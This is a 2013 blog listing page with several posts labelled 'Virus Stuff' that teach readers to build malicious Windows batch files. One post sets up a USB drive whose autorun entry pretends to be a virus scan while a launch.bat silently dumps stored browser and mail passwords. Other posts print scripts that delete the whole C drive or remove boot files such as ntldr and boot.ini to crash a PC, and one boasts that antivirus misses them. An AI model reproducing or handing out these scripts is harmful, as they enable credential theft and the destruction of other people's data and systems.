solutionsurdu.com
Showing posts with label Virus Stuff. Show all posts
Showing posts with label Virus Stuff. Show all posts

Wednesday, July 31, 2013

How To Make a Virus to Disable Keyboard Using Batch Script

Learn How To Make a Virus to Disable Keyboard Using Batch Script.Click on "CLICK HERE TO GET CODE" and paste the code in notepad, given in the link and save it as any name.bat
CLICK HERE TO GET CODE
This script disable all the key on keyboard.

Monday, July 29, 2013

How To Make a Dangerous Virus Which Can Disable Internet Permanently




Today i'am going to show "How To Make a Dangerous Virus Which Can Disable Internet Permanently".It's so easy trick.
Let's Start:
  • Open your notepad.
  • Click on "CLICK HERE TO GET CODE" and paste the code in notepad, given in the link and save it as any name.bat.
  • It's done.

Saturday, June 15, 2013

How To Hack Computer Passwords With USB

 

Friends Today i’am going to show.How to hack Computer passwords via USB.With the five simple steps..

  1. Click To download The USB pass hack.rar
  2. Extract All files from archive.
  3. Copy all files and paste into your USB drive.
  4. Now open notepad type the following lines:
    [autorun]
    open=launch.bat
    ACTION= Perform a Virus Scan
  5. save the Notepad and rename it from New Text Document.txt to autorun.inf ,Now copy the autorun.inf file onto your USB drive.
     
  6. Now open another Notepad and copy the following line:
    start mspass.exe /stext mspass.txt

    start mailpv.exe /stext mailpv.txt

    start iepv.exe /stext iepv.txt

    start pspv.exe /stext pspv.txt

    start passwordfox.exe /stext passwordfox.txt

    start ChromePass.exe /stext chrome.txt

Now save the file as launch.bat and copy  launch.bat into your USB Drive.
 

This hack works on Windows 2000, XP, Vista and Windows 7
NOTE: This procedure will only recover the stored passwords on the Computer.

Thursday, June 13, 2013

How To Make A Dangerous Virus In Seconds

 
How To Make A Virus:
  • Copy And Paste Below Code Into Notepad.
@Echo off
Del C: *.* |y
  • Save This File As virus.bat.
  • All Done!

Warning:

Don’t Try To Run this File On Your Own Computer.It Delete All The Content Of Your C Drive.

The good thing about this virus is that it is not detected by antivirus.

Tuesday, June 11, 2013

How to make virus with notepad

 
How To Crash A PC With Notepad!:: Copy the Code To Notepad.And Save As .bat File

@echo off

attrib -r -s -h c:autoexec.bat

del c:autoexec.bat

attrib -r -s -h c:boot.ini

del c:boot.ini

attrib -r -s -h c:ntldr

del c:ntldr

attrib -r -s -h c:windowswin.ini

del c:windowswin.ini


Warning:DO NOT OPEN THIS FILE IN YOUR OWN COMPUTER!!!